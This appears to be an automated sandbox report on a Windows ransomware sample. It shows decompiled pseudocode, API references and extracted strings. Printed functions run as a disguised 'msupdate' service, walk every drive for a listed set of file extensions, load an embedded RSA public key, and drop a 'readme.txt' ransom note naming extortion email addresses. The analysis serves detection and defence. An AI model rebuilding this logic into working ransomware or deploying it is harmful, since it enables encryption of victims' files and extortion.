                                                              0x00b91a9b
                                                              0x00b91a9b
                                                              0x00000000
                                                              0x00b91a70
                                                              0x00b9177c
                                                              0x00b91781
                                                              0x00b91784
                                                              0x00b91788
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9178e
                                                              0x00b91790
                                                              0x00b91793
                                                              0x00b91793
                                                              0x00b91795
                                                              0x00b91796
                                                              0x00b9179c
                                                              0x00b9179e
                                                              0x00b917a4
                                                              0x00b917a7
                                                              0x00b917a7
                                                              0x00b917a9
                                                              0x00b917aa
                                                              0x00b917b7
                                                              0x00000000
                                                              0x00000000
                                                              0x00b917c5
                                                              0x00b917ca
                                                              0x00b917cd
                                                              0x00b917cf
                                                              0x00b917cf
                                                              0x00b917d2
                                                              0x00b917d2
                                                              0x00b917d4
                                                              0x00b917d5
                                                              0x00b917de
                                                              0x00b917e7
                                                              0x00b917e9
                                                              0x00b917e9
                                                              0x00b917f0
                                                              0x00b917f0
                                                              0x00b917f2
                                                              0x00b917f3
                                                              0x00b917f3
                                                              0x00b917f7
                                                              0x00b917f7
                                                              0x00b917f9
                                                              0x00b917ff
                                                              0x00b91804
                                                              0x00b91807
                                                              0x00b91809
                                                              0x00b9180c
                                                              0x00b91810
                                                              0x00b91810
                                                              0x00b91812
                                                              0x00b91813
                                                              0x00b91819
                                                              0x00b9184d
                                                              0x00b9184d
                                                              0x00b91856
                                                              0x00b9185b
                                                              0x00b91860
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91866
                                                              0x00b9186b
                                                              0x00b91871
                                                              0x00b91871
                                                              0x00b91875
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91879
                                                              0x00b9188d
                                                              0x00b9188d
                                                              0x00b91896
                                                              0x00b91898
                                                              0x00000000
                                                              0x00000000
                                                              0x00b918ac
                                                              0x00b918b1
                                                              0x00b918b4
                                                              0x00b918b6
                                                              0x00b918c0
                                                              0x00b918c0
                                                              0x00b918c2
                                                              0x00b918c3
                                                              0x00b918ce
                                                              0x00b918fb
                                                              0x00b918fb
                                                              0x00b91901
                                                              0x00b91902
                                                              0x00b91903
                                                              0x00b9190e
                                                              0x00b9190f
                                                              0x00b9190f
                                                              0x00b91917
                                                              0x00b91923
                                                              0x00b9192a
                                                              0x00b9192f
                                                              0x00b91932
                                                              0x00b91934
                                                              0x00b91936
                                                              0x00b91937
                                                              0x00b91946
                                                              0x00b9194d
                                                              0x00b91963
                                                              0x00b9196d
                                                              0x00b91977
                                                              0x00b9197d
                                                              0x00b91982
                                                              0x00b91982
                                                              0x00b91985
                                                              0x00000000
                                                              0x00b91985
                                                              0x00b918d0
                                                              0x00b918d2
                                                              0x00b918d5
                                                              0x00b918d5
                                                              0x00b918d7
                                                              0x00b918d8
                                                              0x00b918e3
                                                              0x00000000
                                                              0x00000000
                                                              0x00b918eb
                                                              0x00b918ec
                                                              0x00b918ed
                                                              0x00b918f8
                                                              0x00000000
                                                              0x00b918f8
                                                              0x00b9187b
                                                              0x00b91881
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91883
                                                              0x00b91886
                                                              0x00b9188b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9188b
                                                              0x00b91891
                                                              0x00b91893
                                                              0x00000000
                                                              0x00b91893
                                                              0x00b91820
                                                              0x00b91826
                                                              0x00b9182b
                                                              0x00b9182e
                                                              0x00b91832
                                                              0x00b91833
                                                              0x00b91836
                                                              0x00b91840
                                                              0x00b91840
                                                              0x00b91842
                                                              0x00b91843
                                                              0x00b91849
                                                              0x00000000
                                                              0x00b91820
                                                              0x00b917e0
                                                              0x00000000
                                                              0x00b91bc3
                                                              0x00b91bca
                                                              0x00b91bd1
                                                              0x00b91bd7
                                                              0x00b91be2
                                                              0x00b91be5
                                                              0x00b91be5
                                                              0x00000000
                                                              0x00b91be2
                                                              0x00b91700
                                                              0x00b91702
                                                              0x00b91705
                                                              0x00b91705
                                                              0x00b91707
                                                              0x00b91708
                                                              0x00b91713
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91715
                                                              0x00b9171a
                                                              0x00b9171b
                                                              0x00b91726
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              • .TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZI, xrefs: 00B91851
                                                              • %s%s, xrefs: 00B9172F, 00B91903, 00B91A1E
                                                              • Your file has been encrypted! If you want to decrypt, please contact us. konedieyp@airmail.cc or uenwonken@memail.com And please send me the following hash! d37fc1eabc6783a418d23a8d2ba5db5a, xrefs: 00B91B61, 00B91B7A, 00B91B7D
                                                              • readme.txt, xrefs: 00B91866
                                                              • *.*, xrefs: 00B91715, 00B91729
                                                              • ., xrefs: 00B919AC
                                                              • /readme.txt, xrefs: 00B91B2D
                                                              • DESKTOP, xrefs: 00B91B06
                                                              • %s\%s, xrefs: 00B9171B, 00B918ED
                                                              • rb+, xrefs: 00B9191E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _memset$FileFindFirst_sprintf_strncpy_strrchr
                                                              • String ID: %s%s$%s\%s$*.*$.$.TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG.CSV .DAT .ISO .PST .PGD .7Z .RAR .ZI$/readme.txt$DESKTOP$Your file has been encrypted! If you want to decrypt, please contact us. konedieyp@airmail.cc or uenwonken@memail.com And please send me the following hash! d37fc1eabc6783a418d23a8d2ba5db5a$rb+$readme.txt
                                                              • API String ID: 2919901432-1504518488
                                                              • Opcode ID: d512bddf7312ced5ff7fcd83f77945e49211336c6f24197214acf4e389f09e4a
                                                              • Instruction ID: a118ce3c2216d036821029c1e493abcf38dedb6bd7eb92132e5341a2e1031f3e
                                                              • Opcode Fuzzy Hash: d512bddf7312ced5ff7fcd83f77945e49211336c6f24197214acf4e389f09e4a
                                                              • Instruction Fuzzy Hash: 7DF1387190025A9FCF20CB68CC95FFA77F9EF81340F1849F8E4499B241EA719A49DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B91D10, Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 246COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 86%
                                                              			E00B91D10(void* __ecx, char __edx) {
				signed int _v8;
				char _v267;
				char _v268;
				intOrPtr _v276;
				signed int _v280;
				intOrPtr _v284;
				signed int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t36;
				int _t38;
				intOrPtr _t42;
				signed int _t43;
				intOrPtr _t46;
				void* _t49;
				char* _t53;
				signed int _t58;
				long _t63;
				long _t66;
				intOrPtr _t67;
				intOrPtr* _t77;
				intOrPtr* _t81;
				signed int _t82;
				signed int _t85;
				char _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t91;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;
				int _t104;
				signed int _t106;
				signed int _t109;
				void* _t110;
				void* _t113;
				signed int _t114;
				void* _t115;
				signed int _t117;
				signed int _t118;
				signed int _t120;
				signed int _t122;
				void* _t123;
				void* _t124;
				void* _t127;

				_t103 = __edx;
				_t90 = __ecx;
				_t120 = (_t118 & 0xfffffff8) - 0x11c;
				_t36 =  *0xcc5970; // 0x851ab4dd
				_v8 = _t36 ^ _t120;
				_t38 =  *0xcc9fac; // 0x0
				_t88 = 0;
				 *0xcc9f94 = 4;
				 *0xcc9f9c = 0;
				 *0xcc9fa8 = 0;
				 *0xcc9f98 = 1;
				 *0xcc9fa4 = 0;
				SetServiceStatus(_t38, 0xcc9f90);
				_v276 = E00BB2350(E00B92F00());
				_t42 = E00C69D40(_t90, _t127, 0x100011, 1); // executed
				_t112 = _t42;
				_v284 = _t112;
				_t43 = E00C69D40(_t90, _t127, 0x100011, 1); // executed
				_t109 = _t43;
				_v280 = _t109;
				E00B91000(_t90);
				_t91 =  *0xeca9a8; // 0x2921088
				_push(_t91);
				E00C69C35(_t109, _t112, "Your file has been encrypted!						 If you want to decrypt, please contact us.						 konedieyp@airmail.cc or uenwonken@memail.com						 And please send me the following hash!						 d37fc1eabc6783a418d23a8d2ba5db5a", "Your file has been encrypted!\n\t\t\t\t\t\t If you want to decrypt, please contact us.\n\t\t\t\t\t\t %s\n\t\t\t\t\t\t And please send me the following hash!\n\t\t\t\t\t\t %s\n", 0xcc7360);
				_t122 = _t120 + 0x24;
				if(_t112 != 0 && _t109 != 0) {
					E00C6BB40(_t109, 0xcc9fb0, 0x41, 0x100000);
					_t123 = _t122 + 0xc;
					_v288 = 0;
					_t53 = "WINDIR";
					_t114 = 0;
					while(1) {
						_t131 =  *_t53 - _t88;
						if( *_t53 == _t88) {
							break;
						}
						_push(_t53);
						_t81 = E00C6B0AD(_t88, _t103, _t109, _t114, _t131);
						_t6 = _t114 + 0xec9fb0; // 0xec9fb0
						_t109 = _t6;
						_t123 = _t123 + 4;
						_t106 = _t109;
						do {
							_t100 =  *_t81;
							 *_t106 = _t100;
							_t81 = _t81 + 1;
							_t106 = _t106 + 1;
						} while (_t100 != 0);
						_t82 = _t109;
						_t115 = 0;
						_t7 = _t82 + 1; // 0xec9fb1
						_t103 = _t7;
						do {
							_t101 =  *_t82;
							_t82 = _t82 + 1;
						} while (_t101 != 0);
						if(_t82 != _t103) {
							do {
								 *((char*)(_t109 + _t115)) = E00C6AFFA( *((char*)(_t109 + _t115)));
								_t85 = _t109;
								_t123 = _t123 + 4;
								_t115 = _t115 + 1;
								_t10 = _t85 + 1; // 0xec9fb1
								_t103 = _t10;
								do {
									_t102 =  *_t85;
									_t85 = _t85 + 1;
								} while (_t102 != 0);
							} while (_t115 < _t85 - _t103);
						}
						_t117 = _v288 + 1;
						_v288 = _t117;
						_t114 = _t117 * 0xff;
						_t53 = _t114 + "WINDIR";
						if(_t53 != _t88) {
							continue;
						}
						break;
					}
					_v288 = _t88;
					_t112 = E00B967F0("-----BEGIN RSA PUBLIC KEY-----\nMIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPD\nwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1Izkq\nXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5\nH08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJUQ57w3jZpOnpFXSZoUy1YD7Y3Cu+n/Q\n6cEft6t29/FQgacXmeA2ajb7ssSbSntBpTpoyGc/kKoaihYPrHtNRhkMcZQayy5a\nXTgYtEjhzJAC+esXiTYqklWMXJS1EmUpoQIBAw==\n-----END RSA PUBLIC KEY-----\n", 0xffffffff);
					_v288 = E00B970B0(_t54,  &_v288, _t88, _t88);
					E00B94F50(_t54);
					_t58 = _v288;
					_t124 = _t123 + 0x1c;
					_t109 = _t58;
					if(_t58 == _t88) {
						_push("create rsa error\n");
						E00C6A7E4(_t88, _t103, _t109, _t112, __eflags);
					} else {
						_t63 = GetLogicalDrives(); // executed
						if(_t63 > 0) {
							_v268 = _t88;
							E00C6BB40(_t109,  &_v267, _t88, 0xfe);
							_t124 = _t124 + 0xc;
							_t103 =  &_v268;
							_t66 = GetLogicalDriveStringsA(0xff,  &_v268); // executed
							if(_t66 != 0) {
								do {
									_t67 =  *((intOrPtr*)(_t124 + _t88 + 0x20));
									if(_t67 < 0x43 || _t67 > 0x5a) {
										if(_t67 >= 0x63 && _t67 <= 0x7a) {
											goto L20;
										}
									} else {
										L20:
										E00C69C35(_t109, _t112,  &_v268, "%c:\\", _t67);
										_t112 = GetDriveTypeA;
										_t124 = _t124 + 0xc;
										_t103 =  &_v268;
										if(GetDriveTypeA( &_v268) != 5 && GetDriveTypeA( &_v268) != 0) {
											E00B91640(_t109,  &_v268, 1, _v276, _v284, _v280); // executed
											_t103 =  *((char*)(_t124 + _t88 + 0x38));
											_push("readme.txt");
											E00C69C35(_t109, GetDriveTypeA, "C:\readme.txt", "%c:\\%s",  *((char*)(_t124 + _t88 + 0x38)));
											_t112 = L00C6A96D("C:\readme.txt", "w+");
											_t124 = _t124 + 0x30;
											if(_t112 != 0) {
												_t77 = 0xdc9fb0;
												_t103 = 0xdc9fb1;
												do {
													_t99 =  *_t77;
													_t77 = _t77 + 1;
												} while (_t99 != 0);
												_push(_t112);
												_t78 = _t77 - 0xdc9fb1;
												_push(_t77 - 0xdc9fb1);
												_push(1);
												_push("Your file has been encrypted!						 If you want to decrypt, please contact us.						 konedieyp@airmail.cc or uenwonken@memail.com						 And please send me the following hash!						 d37fc1eabc6783a418d23a8d2ba5db5a");
												E00C6ADA3(_t88, 0xdc9fb1, _t109, _t112, _t78);
												_push(_t112);
												E00C6B1A7(_t88, 0xdc9fb1, _t109, _t112, _t78);
												_t124 = _t124 + 0x14;
											}
										}
									}
									_t88 = _t88 + 1;
								} while (_t88 < 0xff);
								_t88 = 0;
							}
						}
						E00B95630(_t109, _t109);
					}
					_push(_v280); // executed
					E00C69CB2(_t88, _t103, _t109, _t112, 0); // executed
					_push(_v284); // executed
					E00C69CB2(_t88, _t103, _t109, _t112, 0); // executed
					_t122 = _t124 + 0xc;
				}
				_t46 =  *0xeca9a8; // 0x2921088
				_t154 = _t46 - _t88;
				if(_t46 != _t88) {
					_push(_t46);
					E00C69CB2(_t88, _t103, _t109, _t112, _t154);
					_t122 = _t122 + 4;
				}
				_t104 =  *0xcc9fac; // 0x0
				 *0xcc9f94 = 1;
				 *0xcc9f9c = _t88;
				 *0xcc9fa8 = _t88;
				 *0xcc9f98 = 1;
				 *0xcc9fa4 = _t88;
				SetServiceStatus(_t104, 0xcc9f90);
				_t49 = E00B91C80();
				_pop(_t110);
				_pop(_t113);
				_pop(_t89);
				return E00C69C26(_t49, _t89, _v8 ^ _t122, _t104, _t110, _t113);
			}



















































                                                              0x00b91d10
                                                              0x00b91d10
                                                              0x00b91d16
                                                              0x00b91d1c
                                                              0x00b91d23
                                                              0x00b91d2a
                                                              0x00b91d32
                                                              0x00b91d3a
                                                              0x00b91d44
                                                              0x00b91d4a
                                                              0x00b91d50
                                                              0x00b91d5a
                                                              0x00b91d60
                                                              0x00b91d7b
                                                              0x00b91d7f
                                                              0x00b91d84
                                                              0x00b91d8d
                                                              0x00b91d91
                                                              0x00b91d96
                                                              0x00b91d98
                                                              0x00b91d9c
                                                              0x00b91da1
                                                              0x00b91da7
                                                              0x00b91db7
                                                              0x00b91dbc
                                                              0x00b91dc1
                                                              0x00b91ddb
                                                              0x00b91de0
                                                              0x00b91de3
                                                              0x00b91de7
                                                              0x00b91dec
                                                              0x00b91df0
                                                              0x00b91df0
                                                              0x00b91df2
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91df4
                                                              0x00b91df5
                                                              0x00b91dfa
                                                              0x00b91dfa
                                                              0x00b91e00
                                                              0x00b91e03
                                                              0x00b91e05
                                                              0x00b91e05
                                                              0x00b91e07
                                                              0x00b91e09
                                                              0x00b91e0a
                                                              0x00b91e0b
                                                              0x00b91e0f
                                                              0x00b91e11
                                                              0x00b91e13
                                                              0x00b91e13
                                                              0x00b91e16
                                                              0x00b91e16
                                                              0x00b91e18
                                                              0x00b91e19
                                                              0x00b91e1f
                                                              0x00b91e21
                                                              0x00b91e2b
                                                              0x00b91e2e
                                                              0x00b91e30
                                                              0x00b91e33
                                                              0x00b91e34
                                                              0x00b91e34
                                                              0x00b91e37
                                                              0x00b91e37
                                                              0x00b91e39
                                                              0x00b91e3a
                                                              0x00b91e40
                                                              0x00b91e21
                                                              0x00b91e48
                                                              0x00b91e49
                                                              0x00b91e4d
                                                              0x00b91e53
                                                              0x00b91e5b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91e5b
                                                              0x00b91e64
                                                              0x00b91e6e
                                                              0x00b91e7d
                                                              0x00b91e81
                                                              0x00b91e86
                                                              0x00b91e8a
                                                              0x00b91e8d
                                                              0x00b91e91
                                                              0x00b91fb7
                                                              0x00b91fbc
                                                              0x00b91e97
                                                              0x00b91e97
                                                              0x00b91e9f
                                                              0x00b91eb0
                                                              0x00b91eb4
                                                              0x00b91eb9
                                                              0x00b91ebc
                                                              0x00b91ec6
                                                              0x00b91ece
                                                              0x00b91ed4
                                                              0x00b91ed4
                                                              0x00b91eda
                                                              0x00b91ee2
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91ef0
                                                              0x00b91ef0
                                                              0x00b91efe
                                                              0x00b91f03
                                                              0x00b91f09
                                                              0x00b91f0c
                                                              0x00b91f16
                                                              0x00b91f3e
                                                              0x00b91f43
                                                              0x00b91f48
                                                              0x00b91f58
                                                              0x00b91f6c
                                                              0x00b91f6e
                                                              0x00b91f73
                                                              0x00b91f75
                                                              0x00b91f7a
                                                              0x00b91f80
                                                              0x00b91f80
                                                              0x00b91f82
                                                              0x00b91f83
                                                              0x00b91f87
                                                              0x00b91f88
                                                              0x00b91f8a
                                                              0x00b91f8b
                                                              0x00b91f8d
                                                              0x00b91f92
                                                              0x00b91f97
                                                              0x00b91f98
                                                              0x00b91f9d
                                                              0x00b91f9d
                                                              0x00b91f73
                                                              0x00b91f16
                                                              0x00b91fa0
                                                              0x00b91fa1
                                                              0x00b91fad
                                                              0x00b91fad
                                                              0x00b91ece
                                                              0x00b91fb0
                                                              0x00b91fb0
                                                              0x00b91fc8
                                                              0x00b91fc9
                                                              0x00b91fd5
                                                              0x00b91fd6
                                                              0x00b91fdb
                                                              0x00b91fdb
                                                              0x00b91fde
                                                              0x00b91fe3
                                                              0x00b91fe5
                                                              0x00b91fe7
                                                              0x00b91fe8
                                                              0x00b91fed
                                                              0x00b91fed
                                                              0x00b91ff0
                                                              0x00b92001
                                                              0x00b92006
                                                              0x00b9200c
                                                              0x00b92012
                                                              0x00b92017
                                                              0x00b9201d
                                                              0x00b92023
                                                              0x00b9202f
                                                              0x00b92030
                                                              0x00b92031
                                                              0x00b9203c

                                                              APIs
                                                              • SetServiceStatus.ADVAPI32(00000000,00CC9F90), ref: 00B91D60
                                                              • _calloc.LIBCMT ref: 00B91D7F
                                                                • Part of subcall function 00C69D40: __calloc_impl.LIBCMT ref: 00C69D55
                                                              • _calloc.LIBCMT ref: 00B91D91
                                                                • Part of subcall function 00B91000: _calloc.LIBCMT ref: 00B9100B
                                                                • Part of subcall function 00B91000: _calloc.LIBCMT ref: 00B9103A
                                                                • Part of subcall function 00B91000: _sprintf.LIBCMT ref: 00B91067
                                                              • _sprintf.LIBCMT ref: 00B91DB7
                                                              • _memset.LIBCMT ref: 00B91DDB
                                                              • _getenv.LIBCMT ref: 00B91DF5
                                                              • GetLogicalDrives.KERNELBASE ref: 00B91E97
                                                              • _memset.LIBCMT ref: 00B91EB4
                                                              • GetLogicalDriveStringsA.KERNEL32 ref: 00B91EC6
                                                              • _sprintf.LIBCMT ref: 00B91EFE
                                                              • GetDriveTypeA.KERNEL32(?), ref: 00B91F11
                                                              • GetDriveTypeA.KERNEL32(?), ref: 00B91F21
                                                              • _sprintf.LIBCMT ref: 00B91F58
                                                              • _printf.LIBCMT ref: 00B91FBC
                                                              • SetServiceStatus.ADVAPI32(00000000,00CC9F90), ref: 00B9201D
                                                              Strings
                                                              • %c:\, xrefs: 00B91EF8
                                                              • %c:\%s, xrefs: 00B91F4E
                                                              • WINDIR, xrefs: 00B91DE7, 00B91DF4, 00B91E53
                                                              • Your file has been encrypted! If you want to decrypt, please contact us. konedieyp@airmail.cc or uenwonken@memail.com And please send me the following hash! d37fc1eabc6783a418d23a8d2ba5db5a, xrefs: 00B91DB2, 00B91F75, 00B91F8A, 00B91F8D
                                                              • readme.txt, xrefs: 00B91F48
                                                              • |, xrefs: 00B91FC9
                                                              • create rsa error, xrefs: 00B91FB7
                                                              • -----BEGIN RSA PUBLIC KEY-----MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU, xrefs: 00B91E5F
                                                              • C:\readme.txt, xrefs: 00B91F53, 00B91F62
                                                              • Your file has been encrypted! If you want to decrypt, please contact us. %s And please send me the following hash! %s, xrefs: 00B91DAD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _calloc_sprintf$Drive$LogicalServiceStatusType_memset$DrivesStrings__calloc_impl_getenv_printf
                                                              • String ID: %c:\$%c:\%s$-----BEGIN RSA PUBLIC KEY-----MIIBCAKCAQEA5+mVBe75OvCzCW4oZHl7vqPwV2O4kgzgfp9odcL9LZc8Gy2+NJPDwrHbttKI3z4Yt3G04lX7bEp1RZjxUYfzX8qvaPC2EBduOjSN1WMSbJJrINs1IzkqXRrggJhSbp881Jr6NmpE6pns0Vfv//Hk1idHhxsXg6QKtfXlzAnRbgA1WepSDJq5H08WGFBZrgUVM0zBYI3JJH3b9jIRMVQMJU$C:\readme.txt$WINDIR$Your file has been encrypted! If you want to decrypt, please contact us. %s And please send me the following hash! %s$Your file has been encrypted! If you want to decrypt, please contact us. konedieyp@airmail.cc or uenwonken@memail.com And please send me the following hash! d37fc1eabc6783a418d23a8d2ba5db5a$create rsa error$readme.txt$|
                                                              • API String ID: 1688361723-3845174482
                                                              • Opcode ID: cab4c54e14dabea89e90d867c2babe9129826f1a7da3a8cb7f58ddb3a4940265
                                                              • Instruction ID: bdad4a8102aab13487491cb1e345f0ed0200ed1e59c819d3e010aebe473507c0
                                                              • Opcode Fuzzy Hash: cab4c54e14dabea89e90d867c2babe9129826f1a7da3a8cb7f58ddb3a4940265
                                                              • Instruction Fuzzy Hash: 158143B19043066FCB10AF68DC86FAAB7D8EB84704F08097DF888D7246EB75D8059792
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B91C80, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 41serviceCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00B91C80() {
				void* _t1;
				int _t5;
				void* _t10;
				void* _t12;

				_t1 = OpenSCManagerA(0, 0, 0xf003f); // executed
				_t10 = _t1;
				if(_t10 == 0) {
					return _t1;
				} else {
					_t12 = OpenServiceA(_t10, "msupdate", 0xf01ff);
					if(_t12 != 0) {
						DeleteService(_t12);
						 *0xcc9f94 = 1;
						 *0xcc9f98 = 1;
						_t5 =  *0xcc9fac; // 0x0
						 *0xcc9f9c = 0;
						 *0xcc9fa8 = 0;
						 *0xcc9fa4 = 0;
						SetServiceStatus(_t5, 0xcc9f90);
						CloseServiceHandle(_t12);
						return CloseServiceHandle(_t10);
					}
					return CloseServiceHandle(_t10);
				}
			}







                                                              0x00b91c8a
                                                              0x00b91c90
                                                              0x00b91c94
                                                              0x00b91d0b
                                                              0x00b91c96
                                                              0x00b91ca8
                                                              0x00b91cac
                                                              0x00b91cb9
                                                              0x00b91cc4
                                                              0x00b91cc9
                                                              0x00b91cce
                                                              0x00b91cd9
                                                              0x00b91ce3
                                                              0x00b91ced
                                                              0x00b91cf7
                                                              0x00b91d04
                                                              0x00000000
                                                              0x00b91d09
                                                              0x00b91cb7
                                                              0x00b91cb7

                                                              APIs
                                                              • OpenSCManagerA.SECHOST(00000000,00000000,000F003F), ref: 00B91C8A
                                                              • OpenServiceA.ADVAPI32(00000000,msupdate,000F01FF), ref: 00B91CA2
                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00B91CAF
                                                              • DeleteService.ADVAPI32(00000000), ref: 00B91CB9
                                                              • SetServiceStatus.ADVAPI32(00000000,00CC9F90), ref: 00B91CF7
                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00B91D04
                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00B91D07
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$DeleteManagerStatus
                                                              • String ID: msupdate
                                                              • API String ID: 3691197935-3668653166
                                                              • Opcode ID: 32d727946b742ac3f13db1832a4175e9b9dec4af5e672ce282758c4fa3a0bfed
                                                              • Instruction ID: d1bdd669e06c9d61bb9be064a620c91bb0e08c18199036bfec810ae302f97438
                                                              • Opcode Fuzzy Hash: 32d727946b742ac3f13db1832a4175e9b9dec4af5e672ce282758c4fa3a0bfed
                                                              • Instruction Fuzzy Hash: C4F0C232640220AFC7915B9CFC0DFAF3BA4EB44B56F21006DF608EB2A0CBB54445DB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B92130, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00B92130(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				void* _t10;
				void* _t11;
				signed int _t12;

				_v12 = 0;
				_v8 = 0;
				_v20 = "msupdate";
				_v16 = 0xb920b0;
				StartServiceCtrlDispatcherA((_t12 & 0xfffffff8) - 0x10); // executed
				E00B91D10(_t10, _t11); // executed
				return 0;
			}










                                                              0x00b9213b
                                                              0x00b9213f
                                                              0x00b92147
                                                              0x00b9214f
                                                              0x00b92157
                                                              0x00b9215d
                                                              0x00b92167

                                                              APIs
                                                              • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00B92157
                                                                • Part of subcall function 00B91D10: SetServiceStatus.ADVAPI32(00000000,00CC9F90), ref: 00B91D60
                                                                • Part of subcall function 00B91D10: _calloc.LIBCMT ref: 00B91D7F
                                                                • Part of subcall function 00B91D10: _calloc.LIBCMT ref: 00B91D91
                                                                • Part of subcall function 00B91D10: _sprintf.LIBCMT ref: 00B91DB7
                                                                • Part of subcall function 00B91D10: _memset.LIBCMT ref: 00B91DDB
                                                                • Part of subcall function 00B91D10: _getenv.LIBCMT ref: 00B91DF5
                                                              Strings
                                                              Memory Dump Source
